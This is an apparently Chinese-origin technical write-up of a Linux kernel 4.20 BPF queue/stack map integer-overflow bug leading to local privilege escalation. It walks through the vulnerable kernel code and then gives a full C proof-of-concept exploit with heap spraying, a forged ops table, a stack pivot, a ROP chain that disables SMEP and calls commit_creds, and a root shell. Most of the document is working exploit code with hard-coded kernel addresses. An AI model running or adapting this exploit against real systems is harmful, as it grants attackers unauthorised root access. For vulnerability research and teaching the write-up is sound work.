kernel4.20_BPF_LPE Analysis
Vulnerability Analysis
Data structures involved:
+struct bpf_queue_stack {
+ struct bpf_map map;
+ raw_spinlock_t lock;
+ u32 head, tail;
+ u32 size; /* max_entries + 1 */
+
+ char elements[0] __aligned(8);
+};
struct bpf_map {
/* The first two cachelines with read-mostly members of which some
* are also accessed in fast-path (e.g. ops, max_entries).
*/
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type;
u32 key_size;
u32 value_size;
u32 max_entries;
u32 map_flags;
u32 pages;
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf;
bool unpriv_array;
/* 55 bytes hole */
/* The 3rd and 4th cacheline with misc members to avoid false sharing
* particularly with refcounting.
*/
struct user_struct *user ____cacheline_aligned;
atomic_t refcnt;
atomic_t usercnt;
struct work_struct work;
char name[BPF_OBJ_NAME_LEN];
};
/* map is generic key/value storage optionally accesible by eBPF programs */
struct bpf_map_ops {
/* funcs callable from userspace (via syscall) */
int (*map_alloc_check)(union bpf_attr *attr);
struct bpf_map *(*map_alloc)(union bpf_attr *attr);
void (*map_release)(struct bpf_map *map, struct file *map_file);
void (*map_free)(struct bpf_map *map);
int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
void (*map_release_uref)(struct bpf_map *map);
/* funcs callable from userspace and from eBPF programs */
void *(*map_lookup_elem)(struct bpf_map *map, void *key);
int (*map_update_elem)(struct bpf_map *map, void *key, void *value, u64 flags);
int (*map_delete_elem)(struct bpf_map *map, void *key);
int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
int (*map_pop_elem)(struct bpf_map *map, void *value);
int (*map_peek_elem)(struct bpf_map *map, void *value);
/* funcs called by prog_array and perf_event_array map */
void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
int fd);
void (*map_fd_put_ptr)(void *ptr);
u32 (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
u32 (*map_fd_sys_lookup_elem)(void *ptr);
void (*map_seq_show_elem)(struct bpf_map *map, void *key,
struct seq_file *m);
int (*map_check_btf)(const struct bpf_map *map,
const struct btf_type *key_type,
const struct btf_type *value_type);
};
union bpf_attr {
	struct { /* anonymous struct used by BPF_MAP_CREATE command */
		__u32 map_type;    /* one of enum bpf_map_type */
		__u32 key_size;    /* size of key in bytes */
		__u32 value_size;  /* size of value in bytes */
		__u32 max_entries; /* max number of entries in a map */
		__u32 map_flags;   /* BPF_MAP_CREATE related
		                    * flags defined above.
		...
Vulnerable call chain that allocates the qs heap object:
__x64_sys_bpf()
->map_create()
->find_and_alloc_map()
->queue_stack_map_alloc()
+static struct bpf_map *queue_stack_map_alloc(union bpf_attr *attr)
+{
+ int ret, numa_node = bpf_map_attr_numa_node(attr);
+ struct bpf_queue_stack *qs;
+ u32 size, value_size;
+ u64 queue_size, cost;
+
+ size = attr->max_entries + 1; // if max_entries is 0xffffffff, this u32 addition wraps to 0
+ value_size = attr->value_size;
+
+ queue_size = sizeof(*qs) + (u64) value_size * size;
+
+ cost = queue_size;
+ if (cost >= U32_MAX - PAGE_SIZE)
+ return ERR_PTR(-E2BIG);
+
+ cost = round_up(cost, PAGE_SIZE) >> PAGE_SHIFT;
+
+ ret = bpf_map_precharge_memlock(cost);
+ if (ret < 0)
+ return ERR_PTR(ret);
+
+ qs = bpf_map_area_alloc(queue_size, numa_node); // qs is allocated much too small, yet elements can still be indexed beyond it, giving an out-of-bounds write
+ if (!qs)
+ return ERR_PTR(-ENOMEM);
+
+ memset(qs, 0, sizeof(*qs));
+
+ bpf_map_init_from_attr(&qs->map, attr);
+
+ qs->map.pages = cost;
+ qs->size = size;
+
+ raw_spin_lock_init(&qs->lock);
+
+ return &qs->map;
+}
The update syscall is then used to write out of bounds past the qs object:
__x64_sys_bpf()
->map_update_elem()
->queue_stack_map_push_elem() // heap overflow
+static int queue_stack_map_push_elem(struct bpf_map *map, void *value,
+ u64 flags)
+{
+ struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ unsigned long irq_flags;
+ int err = 0;
+ void *dst;
+
+ /* BPF_EXIST is used to force making room for a new element in case the
+ * map is full
+ */
+ bool replace = (flags & BPF_EXIST);
+
+ /* Check supported flags for queue and stack maps */
+ if (flags & BPF_NOEXIST || flags > BPF_EXIST)
+ return -EINVAL;
+
+ raw_spin_lock_irqsave(&qs->lock, irq_flags);
+
+ if (queue_stack_map_is_full(qs)) {
+ if (!replace) {
+ err = -E2BIG;
+ goto out;
+ }
+ /* advance tail pointer to overwrite oldest element */
+ if (unlikely(++qs->tail >= qs->size))
+ qs->tail = 0;
+ }
+
+ dst = &qs->elements[qs->head * qs->map.value_size];
+ memcpy(dst, value, qs->map.value_size); // value is user-controlled data, dst points into the elements array
+
+ if (unlikely(++qs->head >= qs->size))
+ qs->head = 0;
+
+out:
+ raw_spin_unlock_irqrestore(&qs->lock, irq_flags);
+ return err;
+}
If max_entries is passed as 0xffffffff, size wraps to 0 and the allocation request ends up being only sizeof(*qs), which kmalloc-256 serves with a 0x100-byte chunk. The first 0xd0 bytes hold the bpf_queue_stack structure itself and the remaining 0x30 bytes hold the elements array (elements sits at offset 0xd0 in the structure), so elements + 0x30, i.e. the 7th 8-byte slot of a pushed value (fake_elements[6] in the PoC below), lands exactly at the start of the next heap chunk.
If that neighbouring chunk is another bpf_queue_stack, elements[6] overwrites its bpf_map->ops pointer, which we redirect to a forged bpf_map_ops vtable.
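A minimal sketch of this arithmetic in plain user-space C (not kernel code; the 0xd0 structure size and the kmalloc-256 sizing are taken from the analysis above):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint32_t max_entries = 0xffffffff;      /* attr->max_entries */
	uint32_t value_size  = 0x40;            /* attr->value_size  */
	uint32_t size        = max_entries + 1; /* u32 addition wraps to 0 */
	/* queue_size = sizeof(*qs) + value_size * size == sizeof(*qs) == 0xd0 */
	uint64_t queue_size  = 0xd0 + (uint64_t)value_size * size;

	/* kmalloc-256 serves the 0xd0-byte request with a 0x100 chunk; a push then
	 * writes value_size (0x40) bytes starting at offset 0xd0, so the last 0x10
	 * bytes spill into the next chunk, and the 8-byte slot at elements + 0x30
	 * (fake_elements[6] in the PoC) overlaps that chunk's first field, bpf_map.ops. */
	printf("size = %u, queue_size = 0x%llx\n", size, (unsigned long long)queue_size);
	return 0;
}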
In the forged table, the slot for void (*map_release)(struct bpf_map *map, struct file *map_file); (the third function pointer in bpf_map_ops, hence fake_ops[2] in the PoC) is replaced with a stack-pivot gadget: the stack is switched into user space, where a prepared ROP chain performs the privilege escalation. This technique requires SMAP to be disabled, and because no information is leaked, KASLR is not bypassed either (all addresses are hard-coded).
Exploitation
/*************************************************************
* File Name: poc.c
*
* Created on: 2020-05-26 07:56:22
* Author: De4dCr0w
*
* Last Modified: 2020-05-28 05:12:50
* Description:
************************************************************/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <string.h>
#include <signal.h>
#include <endian.h>
#define BPF_OBJ_NAME_LEN 16U
#define __u32 uint32_t
#define __aligned_u64 uint64_t
#define __u64 uint64_t
#define __NR_bpf 321
union bpf_attr {
struct { /* anonymous struct used by BPF_MAP_CREATE command */
__u32 map_type; /* one of enum bpf_map_type */
__u32 key_size; /* size of key in bytes */
__u32 value_size; /* size of value in bytes */
__u32 max_entries; /* max number of entries in a map */
__u32 map_flags; /* BPF_MAP_CREATE related
* flags defined above.
*/
__u32 inner_map_fd; /* fd pointing to the inner map */
__u32 numa_node; /* numa node (effective only if
* BPF_F_NUMA_NODE is set).
*/
char map_name[BPF_OBJ_NAME_LEN];
__u32 map_ifindex; /* ifindex of netdev to create on */
__u32 btf_fd; /* fd pointing to a BTF type data */
__u32 btf_key_type_id; /* BTF type_id of the key */
__u32 btf_value_type_id; /* BTF type_id of the value */
};
struct { /* anonymous struct used by BPF_MAP_*_ELEM commands */
__u32 map_fd;
__aligned_u64 key;
union {
__aligned_u64 value;
__aligned_u64 next_key;
};
__u64 flags;
};
};
#define KERNCALL __attribute__((regparm(3)))
void* (*prepare_kernel_cred)(void*) KERNCALL = (void*) 0xFFFFFFFF810E3D40; // TODO:change it
void (*commit_creds)(void*) KERNCALL = (void*) 0xFFFFFFFF810E3AB0; // TODO:change it
uint64_t pop_rax_ret = 0xffffffff81029c71; // pop rax ; ret ;
uint64_t native_write_cr4 = 0xffffffff810037d5; // mov cr4, rax; push rcx; popfq; ret;
uint64_t pop_rdi_ret = 0xffffffff810013b9; // pop rdi ; ret ;
uint64_t pop_rsi_ret = 0xffffffff81001c50; // pop rsi ; ret ;
uint64_t push_rax_push_rsi = 0xffffffff81264e0b; // push rax; push rsi; ret;
uint64_t swapgs_ret = 0xffffffff81c00d5a; // swapgs; popfq; retq;
uint64_t iretq = 0xffffffff8106d8f4; // iretq; cli;
unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_stat() {
asm(
"movq %%cs, %0;"
"movq %%ss, %1;"
"movq %%rsp, %2;"
"pushfq;"
"popq %3;"
: "=r" (user_cs), "=r" (user_ss), "=r" (user_sp), "=r" (user_rflags) : : "memory");
}
void shell()
{
if(!getuid())
{
printf("[+] you got root!\n");
system("/bin/sh");
}
else
{
printf("[T.T] privilege escalation failed !!!\n");
}
exit(0);
}
uint64_t victim[16];
void spray(union bpf_attr *attr)
{
for(int i = 0; i < 16; i++){
victim[i] = syscall(__NR_bpf, 0, attr, 0x2c);
}
return;
}
void close_map_fd(){
for(int i = 0; i < 16; i++){
close(victim[i]);
}
return;
}
int malloc_map(union bpf_attr *user_attr){
memset(user_attr, 0, sizeof(union bpf_attr));
user_attr->map_type = 0x17; //BPF_MAP_TYPE_STACK
user_attr->key_size = 0;
user_attr->value_size = 0x40;
user_attr->max_entries = -1;
user_attr->map_flags = 0;
user_attr->inner_map_fd = -1;
user_attr->numa_node = 0;
printf("[+] user_attr : %p\n", user_attr);
int res = syscall(__NR_bpf, 0, user_attr, 0x2c);
if(res == -1){
printf("__NR_bpf 0 error!\n");
exit(0);
}
printf("res : %d\n", res);
return res;
}
void update_map(int res, union bpf_attr *user_attr, uint64_t fake_elements){
user_attr->map_fd = res;
user_attr->key = 0;
user_attr->value = (uint64_t)fake_elements;
user_attr->flags = 2;
res = syscall(__NR_bpf, 2, user_attr, 0x2c);
}
void get_shell_again(int sig){
puts("SIGSEGV found");
puts("get shell again");
system("id");
char *shell = "/bin/sh";
char *args[] = {shell, NULL};
execve(shell, args, NULL);
}
int main()
{
signal(SIGSEGV, get_shell_again);
save_stat();
union bpf_attr *user_attr = malloc(sizeof(union bpf_attr));
int res = malloc_map(user_attr);
spray(user_attr);
uint64_t *fake_ops = mmap((void *)0xa000000000,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
void *rop_base = mmap((void *)0x81012000,0x8000,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0);
if(rop_base == MAP_FAILED){
perror("[-] mmap failed");
}
int i = 0;
uint64_t rop[0x30];
rop[i++] = pop_rax_ret;
rop[i++] = 0x6f0;
rop[i++] = native_write_cr4;
rop[i++] = pop_rdi_ret;
rop[i++] = 0;
rop[i++] = (uint64_t )prepare_kernel_cred;
rop[i++] = pop_rsi_ret; // load the address of pop_rdi_ret into rsi
rop[i++] = pop_rdi_ret;
rop[i++] = push_rax_push_rsi; // push rax, then rsi; the final ret lands on pop_rdi_ret, which moves rax (the new cred) into rdi
rop[i++] = (uint64_t )commit_creds;
rop[i++] = swapgs_ret;
rop[i++] = 0;
rop[i++] = iretq;
rop[i++] = (uint64_t )&shell;
rop[i++] = user_cs;
rop[i++] = user_rflags;
rop[i++] = user_sp;
rop[i++] = user_ss;
memcpy((void *)(rop_base + 0x75a), &rop, sizeof(rop));
uint64_t xchg_esp = 0xffffffff8101275a; // xchg eax, esp; ret;
printf("[+] xchg_esp: 0x%lx\n", xchg_esp);
fake_ops[2] = xchg_esp;
uint64_t *fake_elements = malloc(0x40);
for(int i = 0; i < 8; i++){
fake_elements[i] = i;
}
fake_elements[6] = (uint64_t)fake_ops;
printf("[+] fake_elements: %p\n", fake_elements);
update_map(res, user_attr, (uint64_t)fake_elements);
close_map_fd();
return 0;
}
To summarize: first allocate a map with max_entries = 0xffffffff to trigger the overflow, spray further maps so another bpf_queue_stack sits right behind it, then update (push to) the first map to write out of bounds, overwriting elements[6] with the forged ops pointer whose map_release slot points at the stack-pivot gadget and ROP chain (which switches to a user-space stack). Finally, closing the map fds triggers map_release, runs the ROP chain, and escalates privileges.
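Why closing the fd reaches the forged pointer: the map file's ->release handler calls the map_release op if it is set. Roughly (paraphrased from memory of kernel/bpf/syscall.c around v4.20, not quoted verbatim):

static int bpf_map_release(struct inode *inode, struct file *filp)
{
	struct bpf_map *map = filp->private_data;

	/* if a map_release op is installed, invoke it with the map and its file */
	if (map->ops->map_release)
		map->ops->map_release(map, filp);

	bpf_map_put_with_uref(map);
	return 0;
}

With ops redirected to fake_ops, this indirect call fetches fake_ops[2], i.e. the xchg eax, esp gadget at 0xffffffff8101275a. Assuming the compiled call goes through rax (which the PoC relies on), eax holds the gadget's low 32 bits, so the pivot lands rsp at 0x8101275a, inside the user mapping at 0x81012000 where the ROP chain was copied (rop_base + 0x75a).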
An attempt at an out-of-bounds read
In principle, being able to access elements out of bounds should also allow an out-of-bounds read that leaks the address of bpf_map_ops; the patch that introduced the bug also contains code paths that read the contents of elements back out:
+static int __queue_map_get(struct bpf_map *map, void *value, bool delete)
+{
+ struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ unsigned long flags;
+ int err = 0;
+ void *ptr;
+
+ raw_spin_lock_irqsave(&qs->lock, flags);
+
+ if (queue_stack_map_is_empty(qs)) {
+ err = -ENOENT;
+ goto out;
+ }
+
+ ptr = &qs->elements[qs->tail * qs->map.value_size];
+ memcpy(value, ptr, qs->map.value_size);
+
+ if (delete) {
+ if (unlikely(++qs->tail >= qs->size))
+ qs->tail = 0;
+ }
+
+out:
+ raw_spin_unlock_irqrestore(&qs->lock, flags);
+ return err;
+}
+
+
+static int __stack_map_get(struct bpf_map *map, void *value, bool delete)
+{
+ struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ unsigned long flags;
+ int err = 0;
+ void *ptr;
+ u32 index;
+
+ raw_spin_lock_irqsave(&qs->lock, flags);
+
+ if (queue_stack_map_is_empty(qs)) {
+ err = -ENOENT;
+ goto out;
+ }
+
+ index = qs->head - 1;
+ if (unlikely(index >= qs->size))
+ index = qs->size - 1;
+
+ ptr = &qs->elements[index * qs->map.value_size];
+ memcpy(value, ptr, qs->map.value_size);
+
+ if (delete)
+ qs->head = index;
+
+out:
+ raw_spin_unlock_irqrestore(&qs->lock, flags);
+ return err;
+}
+/* Called from syscall or from eBPF program */
+static int queue_map_peek_elem(struct bpf_map *map, void *value)
+{
+ return __queue_map_get(map, value, false);
+}
+
+/* Called from syscall or from eBPF program */
+static int stack_map_peek_elem(struct bpf_map *map, void *value)
+{
+ return __stack_map_get(map, value, false);
+}
The chain map_lookup_elem -> map->ops->map_peek_elem -> __queue_map_get reaches the element-reading code above.
case BPF_MAP_LOOKUP_ELEM:
err = map_lookup_elem(&attr);
break;
and, inside map_lookup_elem():
else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
map->map_type == BPF_MAP_TYPE_STACK) {
err = map->ops->map_peek_elem(map, value);
The corresponding user-space code is:
user_attr->map_fd = res;
user_attr->key = 0;
user_attr->value = (uint64_t)leak;
user_attr->flags = 0;
syscall(__NR_bpf, 1, user_attr, 0x2c);
printf("[+] leak : 0x%lx\n", leak[0]);
However, this does not get past the queue_stack_map_is_empty(qs) check: elements starts out empty, so the read is refused. To make the map non-empty we first have to push data via map_update_elem, but the push memcpy()s a full value_size bytes, so the subsequent read only returns the data we just pushed; by then the neighbouring bpf_map_ops pointer has already been overwritten, so its address cannot be leaked.
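For completeness, a sketch of the attempted leak sequence (leak_map() is a hypothetical helper wrapping BPF_MAP_LOOKUP_ELEM, reusing malloc_map()/update_map() and fake_elements from the PoC above):

uint64_t leak[8]; /* 0x40 bytes, matching value_size */

void leak_map(int fd, union bpf_attr *attr)
{
	attr->map_fd = fd;
	attr->key = 0;
	attr->value = (uint64_t)leak;
	attr->flags = 0;
	syscall(__NR_bpf, 1, attr, 0x2c); /* BPF_MAP_LOOKUP_ELEM -> map_peek_elem */
}

/* Intended usage:
 *   int fd = malloc_map(user_attr);
 *   leak_map(fd, user_attr);   // rejected: queue_stack_map_is_empty() -> -ENOENT
 *   update_map(fd, user_attr, (uint64_t)fake_elements); // makes the map non-empty,
 *   leak_map(fd, user_attr);   // but the push already clobbered the adjacent ops
 *                              // pointer, so we only read back our own data
 */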
References
http://p4nda.top/2019/01/02/kernel-bpf-overflow/#%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
https://www.anquanke.com/post/id/166819#h3-5
https://github.com/ww9210/kernel4.20_bpf_LPE
Patch that introduced the vulnerability: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/bpf?id=f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92
commit:f1a2e44a3aeccb3ff18d3ccc0b0203e70b95bd92